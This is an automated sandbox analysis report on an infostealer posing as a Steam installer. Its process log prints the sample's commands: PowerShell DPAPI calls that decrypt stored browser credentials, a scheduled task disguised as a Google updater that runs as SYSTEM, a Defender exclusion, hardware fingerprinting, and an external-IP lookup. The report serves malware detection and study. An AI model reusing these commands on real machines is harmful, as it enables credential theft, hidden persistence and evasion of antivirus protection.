| Task | Platform | Score |
| --- | --- | --- |
| Overview | overview | 7 |
| Static | static | 3 |
| Steam_q9c9lijy.exe | windows7-x64 | 7 |
| Steam_q9c9lijy.exe | windows10-2004-x64 | 7 |
| $PLUGINSDI...ls.dll | windows7-x64 | 3 |
| $PLUGINSDI...ls.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...em.dll | windows7-x64 | 3 |
| $PLUGINSDI...em.dll | windows10-2004-x64 | 3 |
| LICENSES.c...m.html | windows7-x64 | 1 |
| LICENSES.c...m.html | windows10-2004-x64 | 1 |
| Steam.exe | windows7-x64 | 1 |
| Steam.exe | windows10-2004-x64 | 7 |
| d3dcompiler_47.dll | windows10-2004-x64 | 1 |
| ffmpeg.dll | windows7-x64 | 1 |
| ffmpeg.dll | windows10-2004-x64 | 1 |
| libEGL.dll | windows7-x64 | 1 |
| libEGL.dll | windows10-2004-x64 | 1 |
| libGLESv2.dll | windows7-x64 | 1 |
| libGLESv2.dll | windows10-2004-x64 | 1 |
| resources/elevate.exe | windows7-x64 | 1 |
| resources/elevate.exe | windows10-2004-x64 | 1 |
| vk_swiftshader.dll | windows7-x64 | 1 |
| vk_swiftshader.dll | windows10-2004-x64 | 1 |
| vulkan-1.dll | windows7-x64 | 1 |
| vulkan-1.dll | windows10-2004-x64 | 1 |
| $PLUGINSDI...7z.dll | windows7-x64 | 3 |
| $PLUGINSDI...7z.dll | windows10-2004-x64 | 3 |

Analysis
max time kernel: 2s
max time network: 12s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-04-2024 19:44
Static task: static1

| Behavioral task | Sample | Resource |
| --- | --- | --- |
| behavioral1 | Steam_q9c9lijy.exe | win7-20240221-en |
| behavioral2 | Steam_q9c9lijy.exe | win10v2004-20240226-en |
| behavioral3 | $PLUGINSDIR/StdUtils.dll | win7-20240221-en |
| behavioral4 | $PLUGINSDIR/StdUtils.dll | win10v2004-20240226-en |
| behavioral5 | $PLUGINSDIR/System.dll | win7-20240221-en |
| behavioral6 | $PLUGINSDIR/System.dll | win10v2004-20240226-en |
| behavioral7 | LICENSES.chromium.html | win7-20231129-en |
| behavioral8 | LICENSES.chromium.html | win10v2004-20240226-en |
| behavioral9 | Steam.exe | win7-20240319-en |
| behavioral10 | Steam.exe | win10v2004-20240226-en |
| behavioral11 | d3dcompiler_47.dll | win10v2004-20240226-en |
| behavioral12 | ffmpeg.dll | win7-20240215-en |
| behavioral13 | ffmpeg.dll | win10v2004-20240226-en |
| behavioral14 | libEGL.dll | win7-20240221-en |
| behavioral15 | libEGL.dll | win10v2004-20231215-en |
| behavioral16 | libGLESv2.dll | win7-20240221-en |
| behavioral17 | libGLESv2.dll | win10v2004-20240226-en |
| behavioral18 | resources/elevate.exe | win7-20240215-en |
| behavioral19 | resources/elevate.exe | win10v2004-20240226-en |
| behavioral20 | vk_swiftshader.dll | win7-20240221-en |
| behavioral21 | vk_swiftshader.dll | win10v2004-20240226-en |
| behavioral22 | vulkan-1.dll | win7-20240221-en |
| behavioral23 | vulkan-1.dll | win10v2004-20240226-en |
| behavioral24 | $PLUGINSDIR/nsis7z.dll | win7-20240221-en |
| behavioral25 | $PLUGINSDIR/nsis7z.dll | win10v2004-20240319-en |

General
Target: Steam.exe
Size: 154.5MB
MD5: 8a3861c725d108eb0c1a17fa43f0487a
SHA1: e4b713028e43e0f99e4568aa3902384b52951ed2
SHA256: 0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef
SHA512: db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad
SSDEEP: 1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.

| description | ioc | process |
| --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | Steam.exe |

Loads dropped DLL (1 IoCs)

| pid | process |
| --- | --- |
| 4508 | Steam.exe |

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.

| flow | ioc |
| --- | --- |
| 14 | api.ipify.org |

An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)

| pid | process |
| --- | --- |
| 1516 | cmd.exe |
| 2680 | cmd.exe |

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates processes with tasklist (1 TTPs, 2 IoCs)

| pid | process |
| --- | --- |
| 4032 | tasklist.exe |
| 1604 | tasklist.exe |

Suspicious behavior: EnumeratesProcesses (2 IoCs)

| pid | process |
| --- | --- |
| 3152 | powershell.exe |
| 3152 | powershell.exe |

Suspicious use of AdjustPrivilegeToken (3 IoCs)

| description | pid | process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 4032 | tasklist.exe |
| Token: SeDebugPrivilege | 1604 | tasklist.exe |
| Token: SeDebugPrivilege | 3152 | powershell.exe |

Suspicious use of WriteProcessMemory (16 IoCs)

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 4508 wrote to memory of 3388 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 3388 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 4380 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 4380 | 4508 | Steam.exe | cmd.exe |
| PID 4380 wrote to memory of 4032 | 4380 | cmd.exe | tasklist.exe |
| PID 4380 wrote to memory of 4032 | 4380 | cmd.exe | tasklist.exe |
| PID 3388 wrote to memory of 4536 | 3388 | cmd.exe | curl.exe |
| PID 3388 wrote to memory of 4536 | 3388 | cmd.exe | curl.exe |
| PID 4508 wrote to memory of 3052 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 3052 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 1516 | 4508 | Steam.exe | cmd.exe |
| PID 4508 wrote to memory of 1516 | 4508 | Steam.exe | cmd.exe |
| PID 1516 wrote to memory of 3152 | 1516 | cmd.exe | powershell.exe |
| PID 1516 wrote to memory of 3152 | 1516 | cmd.exe | powershell.exe |
| PID 3052 wrote to memory of 1604 | 3052 | cmd.exe | tasklist.exe |
| PID 3052 wrote to memory of 1604 | 3052 | cmd.exe | tasklist.exe |

Processes
C:\Users\Admin\AppData\Local\Temp\Steam.exe (PID 4508): "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (PID 3388): C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\curl.exe (PID 4536): curl http://api.ipify.org/ --ssl-no-revoke
  C:\Windows\system32\cmd.exe (PID 4380): C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\tasklist.exe (PID 4032): tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe (PID 3052): C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\tasklist.exe (PID 1604): tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')3⤵PID:4632
  C:\Windows\system32\cmd.exe (PID 1452): C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    C:\Windows\System32\Wbem\WMIC.exe (PID 3128): wmic diskdrive get serialnumber
  C:\Windows\system32\cmd.exe (PID 3232): C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
    C:\Windows\system32\reg.exe (PID 3188): reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
  C:\Windows\system32\cmd.exe (PID 560): C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
    C:\Windows\system32\schtasks.exe (PID 4312): schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
      - Creates scheduled task(s)
C:\Users\Admin\AppData\Local\Temp\Steam.exe"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:5008
  C:\Windows\system32\cmd.exe (PID 3144): C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
    C:\Windows\System32\Wbem\WMIC.exe (PID 4912): wmic bios get smbiosbiosversion
  C:\Users\Admin\AppData\Local\Temp\Steam.exe (PID 3584): "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  C:\Windows\system32\cmd.exe (PID 3108): C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
    C:\Windows\system32\cscript.exe (PID 2876): cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
      C:\Windows\system32\cmd.exe (PID 4496): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3928): powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  C:\Windows\system32\cmd.exe (PID 1396): C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
    C:\Windows\System32\Wbem\WMIC.exe (PID 64): wmic MemoryChip get /format:list
    C:\Windows\system32\find.exe (PID 4860): find /i "Speed"
  C:\Windows\system32\cmd.exe (PID 2916): C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    C:\Windows\System32\Wbem\WMIC.exe (PID 1100): wmic baseboard get serialnumber
  C:\Windows\system32\cmd.exe (PID 1360): C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    C:\Windows\System32\Wbem\WMIC.exe (PID 1516): wmic path win32_computersystemproduct get uuid
  C:\Windows\system32\cmd.exe (PID 4792): C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4152): powershell wininit.exe
      C:\Windows\system32\wininit.exe (PID 3024): "C:\Windows\system32\wininit.exe"

Network
MITRE ATT&CK Enterprise v15
Downloads